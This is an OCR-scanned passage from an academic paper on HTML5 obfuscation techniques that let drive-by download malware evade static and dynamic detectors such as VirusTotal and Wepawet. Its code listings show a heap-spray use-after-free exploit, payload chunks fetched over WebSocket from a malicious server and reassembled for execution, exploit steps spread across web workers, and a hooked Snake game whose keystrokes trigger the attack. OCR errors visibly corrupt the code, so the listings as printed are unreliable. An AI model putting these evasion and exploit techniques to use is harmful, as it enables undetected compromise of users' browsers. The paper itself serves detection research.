with the server. The server sends back to the malicious webpage a series of 
malware chunks that are differently processed based on the specihc storage API. 

Listing 4 shows a basic implementation of the delegated preparation tech¬ 
nique (for sake of clarity some details have been omitted and self-explanatory 
variable names have been chosen). It is assumed that each malware chunk is a 
single instruction of the original malware. First, a connection with the malicious 
server is opened (line 2). On the reception of a message (line 3), the received 
chunk is stored in a local database (line 7). Once the connection is closed by 
the server (line 11), the full code is reassembled by means of a single call to the 
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GROUP_CONCAT() function of SQLite (line 14), which transparently returns the 
concatenation of all the stored values. 

As shown in the previous example, the use of the WebSQL API enables to 
assemble the malware in a transparent way, thus completely avoiding any string 
manipulations. Currently, the WebSQL API specification is being supported by 
Webkit-based browsers, such as Google Chrome, Apple Safari and Opera. In 
case the target browser does not support Web SQL APIs (e.g., Mozilla Firefox), 
Web Storage ([44]) or Indexed DB ([43]) could be leveraged instead. Listing 5 
shows a possible implementation of the previous attack by using the Indexed 
DB API. As for the previous case, on the reception of a message the chunk is 
stored on the local database (Line 11). When the connection is closed by the 
server, a cursor is used in order to step through all the values in the object store 
(Line 17). The onsuccessO callback (Line 19) is called for each chunk in the 
object store, which can be processed as consequence (e.g. passed to evalO). 
Also in this case, no string manipulation is performed. 

Another HTML5 API that can be used for the delegated preparation is 
Blob, or BlobBuilder in older browser versions. Both APIs can be leveraged to 
transparently concatenate a series of strings without using any suspicious string 
manipulation functions. An example is shown in Listing 6, where a BlobBuilder 
object is used to reassemble a hex-encoded payload obtained by means of a 
WebSocket connection. In more details, the chunks returned by the server are 
progressively appended to a BlobBuilder object (line 12). When the server closes 
the connection, the complete blob is reassembled by means of the getBlobO 
function (line 17). The content of the blob is subsequently read and merged in 
a single string by means of the FileReader API (line 24). Finally, the resulting 
payload is processed (line 19). Even in this case no string manipulation functions 
have been used. 
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6.3 Experiment 2: Evasion Through Distributed Prepa¬ 
ration 

The basic idea of this technique is to obfuscate the malicious code by delegating 
the execution of different parts of a same malware to different dedicated threads. 
It can be accomplished by leveraging the Web Worker API supported by most 
of recent browsers. A graphical representation of the example presented in this 
section is described through the tree diagram in Figure 1. The web workers 
are represented by nodes and the dependency correlations among web workers 
are represented by edges. In more details, two web workers wwl and ww2 are 
used to retrieve the payload. They do not have any correlation, therefore can 
be concurrently executed (same level). After their termination, ww3 is activated 
in order to perform the heap spray (see Section 2) . Clearly, this step depends 
on the output of wwl and ww2. As consequence, ww3 can only start once the 
execution of its children is terminated. The memory corruption data is generated 
by ww4, which finally triggers the exploit. Synchronization among web workers 
can be managed by means of JavaScript events. It is worth noting that the 
malware execution path could be more complex of that presented in Figure I 
and can be generalized in a graph. 

A basic implementation of this example is presented in Listing 7. The attack 
discussed in Section 2 is used as base malware. At runtime, the malicious page 
instantiates two web workers (wwl at line 4 and ww2 at line 12), each responsible 
for delivering a piece of the payload. They are concurrently executed since their 
tasks are independent each other. When a web worker terminates its work, the 
generated data is extracted from the received message (line 5 and line 13) and 
its termination is signaled by means of a Terminated event. The execution of 
ww3 is triggered once all the required parameters have been obtained (line 20). 
The third web worker is responsible for executing the heap spray. Afterwards, 
the code aimed to trigger the exploit is executed (line 27). The exploit data 
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Figure 1: Distributed preparation: malware execution path. 



is generated by means of a last web worker (line 31), ww4, which returns the 
series of blocks used to overwrite the memory referenced by the dangling pointer 
(line 36). Finally, the memory error is triggered (line 40). 

The concurrent preparation technique can be recursively adopted by leverag¬ 
ing nested web workers (currently supported only by Firefox). Listing 8 shows a 
possible implementation of ww3 based on nested web workers. The procedure is 
divided into three phases, each performed by a dedicated web worker. In partic¬ 
ular, ww3a is in charge of generating the padding data, which is in turn passed 
to ww3b together with the payload (line 8). At this point, ww3b can use these 
parameters in order to assemble the spray block. The last step is performed by 
ww3c (line 15), which generates a random variable containing the spray data. 
Once the spray is complete, the termination is signaled to the main thread 
(line 25). Despite ww3a, ww3b and ww3c must be executed in sequence since 
depending each others, multiple instances of ww3 can be executed in parallel in 
order to speed-up the procedure. 
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6.4 Experiment 3: Evasion Through User-driven Prepa¬ 
ration 

The user-driven technique is based on the idea that the execution of a malware 
can be associated to the interaction of the user with a web page. Any web- 
based attack can be straightforwardly adapted to this pattern. Technically, the 
execution of a specihc block of instructions is associated to the occurrence of 
a particular event triggered by the user. Only one (or a small subset) of all 
the possible sequences of actions being practicable by the user leads to the full 
execution of the malware. The effectiveness of this attack relies on the fact that 
it not only leverages technical tricks but also human factors, which are difficultly 
reproducible by means of an automated program like a client honeypot. While 
this approach is not strictly related to HTML5, such technology introduces lot 
of functionalities which can be leveraged to realize the user-driven technique. 

Clearly, a difficulty of this technique consists in inducting the victim to per¬ 
form the exact sequence of actions leading to the execution of the malware. The 
example discussed below shows how a common browser game can be adapted 
to this purpose. In particular, this makes use of a simple version of the famous 
Snake game (available at [33]) which is implemented by means of the Canvas 
API [46]. The canvas is used to draw the plane in which the snake moves, and 
the direction of the snake can be changed by the user through the direction 
keys. The canvas is refreshed at progressive time intervals (ticks). The example 
leverages two functions dehned in the original source code: changeDirectionO 
and updateScore 0. The first is in charge of updating the direction of the snake 
and is called whenever a keystroke occurs. The second function is called when¬ 
ever the snake catches some food in order to update the user’s score. Thus, by 
playing the game, the unaware user drives the correct execution of the malware. 

As shown in Listing 9, a hook has been inserted at the beginning of the 
changeDirectionO function which performs a call to the spray_step() pro- 
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cedure. This performs a single step of the heap spray. It is worth noting that 
this procedure can be obfuscated, in turn, by means of the delegated prepara¬ 
tion or the concurrent preparation. The heap spray remains quite effective since 
it is executed within a short time, because a new handle to the keydown event 
is created at each tick without cleaning the previous handles (it is an imperfec¬ 
tion of the original code). It results in multiple calls of the changeDirectionO 
function whenever a key is pressed. When the heap spray is done, a global flag 
bonus is set. 

A hook has been inserted at the end of the updateScoreO function, which 
is in charge of triggering the vulnerability. It is worth noting that the bonus 
and the score parameters are checked before performing the call to the runO 
function. In such a way, the malware execution proceeds only whether (1) the 
heap spray has been completed successfully and (2) the user’s score is above a 
certain threshold. This last requirement would ensure that the player is really 
a human. 

6.5 Analysis and Reports 

A victim machine has been set-up in order to carry out the validation procedure. 
In a first phase, we prepared a set of web pages, each containing one of the chosen 
malware codes, then we verihed that the selected malware detection systems 
correctly classified such pages as malicious. In a second phase, we used the 
same detection systems to surf the web pages containing the malware rewritten 
using the novel obfuscation techniques. For each malware, we wrote hve different 
variants based on the three techniques documented in Section 5. As discussed 
before, the tests have been carried out by using VirusTotal, for on-line static 
and dynamic analysis, and Wepawet, for off-line dynamic analysis. In case of 
multiple resources constituting the malware, each file has been separately sent 
to VirusTotal for analysis. In the case of Wepawet, only the URL to the main 
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page has been submitted. Since the implementation of the systems used for the 
analysis is continuously evolving, which influences the effectiveness of detecting 
new malware, it is important to highlight that all the experiments have been 
conducted between February and April 2013. 

Table 2: VirusTotal detection ratio on the sample malware set 


Malware 

Detection ratio 

A 

11/46 

B 

31/46 

C 

30/46 

D 

28/46 


Table 2 summarizes the detection ratio given by VirusTotal in the first phase 
for each sample malware in Table 1, while Table 3 summarizes the results of 
the analysis performed by Wepawet on the same malware set. As it can be 
clearly seen, VirusTotal which, we recall, makes uses of 46 different (mostly 
static) detection systems, and Wepawet were always able to correctly identify 
the analyzed code as malicious. It is worth recalling that the malware samples 
were equipped with simple proof-of-concept payloads (such as the execution of 
the calc.exe program). Clearly, the use of more complex payloads can only 
determine an increase of the detection rate of static analyzers. Conversely, 
the effectiveness of the obfuscation techniques presented in this work does not 
depend on the complexity/length of the original malware. 

We turn out now our attention to the second phase of the experimentation. 
Here, all the malware codes rewritten using our techniques have always been 
able to evade detection, either when analyzed with VirusTotal or Wepawet, even 
if for different reasons. As expected, VirusTotal was able to classify as malicious 
only codes where a significant part of the original malware, like entire shellcodes 
or exploit patterns, was in the same place. This seems to be mainly due to the 
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Table 3: Wepawet results on the sample malware set 


Malware 

Classification Result 

A 

malign 

B 

malign 

C 

malign 

D 

malign 


limitations of the static approach employed by most of the detection systems 
used by VirusTotal, as a page is classified as malicious if it matches, within a 
certain threshold, with a previously-known signature. Even the sandbox-based 
products used by VirusTotal were not able to detect the threat, most likely due 
to the limitations of the high-interaction honeyclients discussed in Section 3. 
Such a problem should not affect Wepawet, as it employs a completely dynamic 
approach based on emulation to establish if a code contains a malware. Despite 
this, Wepawet always failed in classifying as malicious our code. A careful 
analysis revealed that this behavior was probably due to the module used by 
Wepawet to emulate the execution of JavaScript code, which is apparently not 
able to interpret the HTML5 APIs leveraged by our obfuscation patterns. As 
consequence, Wepawet did not uncover the modified attacks unless a significant 
part of the malware code (e.g. the exploit) was in the main web page. 

7 Conclusions 

In this article we presented three obfuscation techniques that leverage on some 
functionalities of the HTML5 related standards. These techniques can be used 
to write drive-by download malware able to evade either static or dynamic 
detection systems. We have experimentally assessed the effectiveness of our 
techniques by using them to rewrite and analyze a reference set of web malware. 
Our results show that, to the best of the detection systems publicly available 
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nowadays, our techniques seem to succeed in preventing the detection of the 
malware. 

This result was expected when speaking of static detection systems. The 
approach used by these systems to identify malicious code is typically based on 
matching an input code against a database of malware patterns (signatures). 
Since the patterns we were experimenting are still unknown to the existing 
static detection systems, they went undetected. We have got the same results 
event when experimenting with semi-static detection systems. These systems 
implement a blended approach by mixing the signature-based technique with 
more advanced techniques like heuristics and statistical features to distinguish 
between benign and malign tools. Despite this, the semi-static detection sys¬ 
tems employed in our experiments were unable to detect the tested malware. 
Finally, the experimented obfuscation techniques were also able to deceive, in 
our tests, dynamic detection systems. This may be surprising as these systems 
are able to detect a malware not by its code but according to its behavior. A 
further investigation revealed that this failure was due to the inability of these 
systems to recognize and deal with HTML5 related primitives. Thus, a first 
countermeasure would be to update existing dynamic detection systems with 
the support for HTML5 related primitives. This would make it possible to de¬ 
termine if the dynamic approach is able to correctly detect malware obfuscated 
with our techniques. We also provided several hints about the other counter¬ 
measures that could be put in practice in order to counter our techniques. As a 
more general consideration, as far as new web-related technologies increase the 
range of possibilities for web applications, there is a urgent need of hardening 
the standard level of security of web browsers as well as increasing the public 
awareness about the potential dangers of running untrusted web applications. 
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Listing 3: Exploitation of the vulnerability 


<script type="text/javascript"> 

var ATTR = document.ereateAttribute (" FOD ") ; 

ATTR.value = "BAR"; 

var ITER = document.createNodelterator( 

ATTR, NodeFilter.SH0W_ALL , 

{acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; 
}}. 
false 

) ; 

ITER.nextNode () ; 

ITER.nextNode(); 

ITER.previousNodeO ; 

ATTR.value = null; 

const JUNK = unescape ( "7ou414iyou4141 ") ; 
var CONTAINER = new Array (); 

var OBJ = une s cape ( " youOcOc youOcOc youOcOc youOcOc you548e VouTS 19 VonOc 10 7, 
uOcOc") 

while (OBJ.length != 30) 

OBJ += JUNK; 

for (i = 0; i < 1024*1024*2; ++i) 

CONTAINER.push(unescape(OBJ)); 

ITER.referenceNode; 

</script > 
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Listing 4: Evasion through delegated preparation (WebSQL API) 


8 

9 

10 

11 

12 

13 

U 

15 

16 

17 

18 

19 

20 


var ws = new WebSocket( "ws://" + server + + port + "/ws"); 

ws.onmessage = function (evt) 

db.transaction( function (tx) { 

tx.executeSql (' INSERT INTO Cache (id, chunk) VALUES (?, ?) ’ , 
[evt.data.id, evt.data.chunk] ); 

}) ; 

}; 

ws . enclose = functionO 

{ 

db.transaction( function (tx) { 

tx.executeSql (' SELECT GR0UP_C0NCAT(chunk, "") AS full 

FROM Cache', [], function (tx, results) 

{ 

inalicious_code = results . rows . item (0) . full ; 

}, null ) ; 

}) ; 

}; 
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Listing 5: Evasion through delegated preparation (Indexed API) 


var ws = new WebSocket( "ws://" + server + + port + "/ws"); 

ws.onmessage = function (evt) 


var row = { 

"chunk" : evt.data.chunk , 
"id" : evt.data.id 

}; 


var request = objectStore.add(row); 

}; 


ws . onclose = functionO 


var cursorRequest = storeObject.openCursor () ; 

cursorRequest.onsuccess = function(e) 

{ 

var result = e.target.result; 
if(!!result == false) 
return ; 

process(result.value.chunk); 
result. continue (); 

}; 

}; 
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Listing 6: Evasion through delegated preparation (BlobBuilder API) 


function init () 

var bb = new BlobBuilder(); 

var ws = new WebSocket( "ws://" + server + + port + "/ws"); 

ws . onopen = functionO { 
ws.send ("Hello! ") ; 

}; 

ws.onmessage = function (evt) { 
bb.append(evt.data); 

}; 

ws.enclose = function (evt) 

{ 

var blob = bb.getBlob(); 
var fr = new FileReader () ; 

fr.onload = function(e) { 

PAYLOAD = e.target.result; 
process(PAYLOAD); 

}; 

fr.readAsText(blob); 

}; 

> 
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Listing 7: Distributed preparation: main web page 


var TERMEVT = document.createEvent (" Event ") ; 

TERMEVT.initEvent (" Terminated" , true , true ); 

var wwl = new Worker (" wwl.js ") ; 
wwl.onmessage = function (evt) 

RQP = evt.data.rop; 

document.dispatchEvent(TERMEVT); 

>; 

wwl.postMessage ({}) ; 

var ww2 = new Worker (" ww2.js ") ; 
ww2.onmessage = function (evt) 

{ 

PAYLOAD = evt.data.payload; 
document.dispatchEvent(TERMEVT); 

}; 

ww2.postMessage({)-) ; 

document.addEventListener (" Terminated" , function (evt) 

if (!!PAYLOAD) 

ww3.postMessage({’payload' : PAYLOAD}); 

} , false ); 

var ww3 = new Worker (" ww3.js ") ; 

ww3.onmessage = function (evt) 

{ ... 

ATTR.value = null; 
var CONTAINER = new Array(); 
var ww4 = new Worker (" ww4.js ") ; 
ww4.onmessage = function (evt) 

{ 

if ( !!evt.data.mem ) 

{ 

CONTAINER . push (evt . data4'4em) ; 

} 

else 

ITER 

} 

» 4- M ^ » 


.referenceNode; 
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Listing 8: Distributed preparation through nested web workers: Heap Spray 


onmessage = function (evt) 

var ww3a = new Worker (" ww3a.js ") ; 
ww3a.onmessage = function (evt) 

{ 

var PADDING = evt.data.padding; 
ww3b.postMessage({ ^payload’ : PAYLOAD, 'padding’: PADDING }); 

}; 

var ww3b = new Worker (" ww3b . j s ") ; 
ww3b.onmessage = function (evt) 

{ 

var SPRAYBLOCK = evt.data.sprayblock; 
ww3c.postMessage({ 'sprayblock': SPRAYBLOCK }); 

}; 

var ww3c = new Worker (" ww3c.js ") ; 
ww3c.onmessage = function (evt) 

{ 

var CONTINUE = evt.data. continue ; 
if ( !!CONTINUE ) 

ww3a.postMessage({}); 
else 

postMessage({}‘) ; 

} 
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Listing 9: Evasion through User-driven Preparation 


function changeDirection( e ) { 
spray_step(); 

for( i = 0; i < keys.length; i++ ) { 

if ( e.which == keys[i][0] I I e.which == keys [i] [1] ) { 

e.preventDefault () ; 

} 

> 


} 


Listing 10: Evasion through User-driven Preparation 


function updateScore() { 
score += scorelncrement; 

$( ’.score’ ).htinl( score ); 

if ( score > highScore ) { 
highScore = score; 

$( ’.high-score’ ).html( highScore ); 

} 

if ( bonus == 1 && score >= 10 ) 
run ( ) ; 

} 











